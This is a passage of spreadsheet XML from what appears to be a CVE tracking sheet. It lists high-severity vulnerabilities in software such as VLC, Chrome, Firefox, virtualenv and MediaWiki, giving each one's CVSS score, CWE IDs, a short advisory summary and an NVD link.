    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.9 → 8.6)</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102911</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in zosmaai pi-llm-wiki up to 0.11.7. Affected is an unknown function of the file mcp/index.ts of the component wiki_capture_source MCP tool. Executing a manipulation of the argument url can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. Upgrading to version 0.11.8 is able to address this issue. This patch is called 360867034e79175b45c8e04a98e4ca712bbaca35. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102911</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.1 → 8.5)</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102794</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ziroom ZHOME A0101 1.0.1.0. This issue affects some unknown processing of the file /api/ZRnetwork/ping. Such manipulation of the argument url leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102794</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.8 → 8.5)</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102875</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>VLC media player before 3.0.24 contains a path traversal vulnerability in the skins2 ThemeLoader that fails to validate member names in .vlt skin archives. Attackers can craft malicious skin files with path traversal sequences to write arbitrary files with VLC user privileges, enabling code execution through Lua script injection.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102875</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79403</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>An issue in Kilo Code before v7.4.1 allows a local attacker to execute arbitrary code via the permission/allow-everything endpoint</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79403</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100702</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S396"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396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100702</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100756</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 140.17, Thunderbird 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100756</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95301</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95301</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95344</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>Race condition in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass site isolation via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95344</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95376</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>Externally controlled reference in DevTools in Google Chrome prior to 154.0.8037.57 allowed an adjacent attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95376</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102930</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr">
        <is>
          <t>pip:virtualenv</t>
        </is>
      </c>
      <c r="M401" s="5" t="inlineStr">
        <is>
          <t>21.7.12</t>
        </is>
      </c>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr"/>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>`download_wheel()` runs `pip download` and hands the result straight to the seeder, with nothing checking the bytes it gets back. The embedded pip and setuptools wheels carry a `BUNDLE_SHA256` that virtualenv checks on every load, but a wheel fetched over the network for the periodic-update feature or the `--download` flag had no equivalent verification.
A compromised index, a stale mirror, or a MITM'd download (when TLS is intercepted, e.g. via a misconfigured or malicious CA) could substitute a different wheel under the same distribution/version/filename, and virtualenv would cache and seed it into every environment created afterward with no warning.
Fixed by computing the downloaded wheel's sha256 and comparing it against the digest PyPI's public JSON API reports for that exact release, independent of which index actually served the file. The check is skipped, not treated as failure, when a custom index (`PIP_INDEX_URL`, `PIP_EXTRA_INDEX_URL`, `PIP_INDEX`) is configured, since a private index can legitimately serve a different, intentionally rebuilt wheel. Fix: https://github.com/pypa/virtualenv/pull/3251</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102930</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97687</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M402" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr"/>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-440</t>
        </is>
      </c>
      <c r="S402"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402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97687</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100241</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - EventBus Extension allows Excavation.
This issue affects Mediawiki - EventBus Extension: 1.47.0-alpha.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100241</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100244</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - CentralAuth Extension allows Excavation.
This issue affects Mediawiki - CentralAuth Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100244</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S405"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405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S406"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406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S407"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407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102728</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
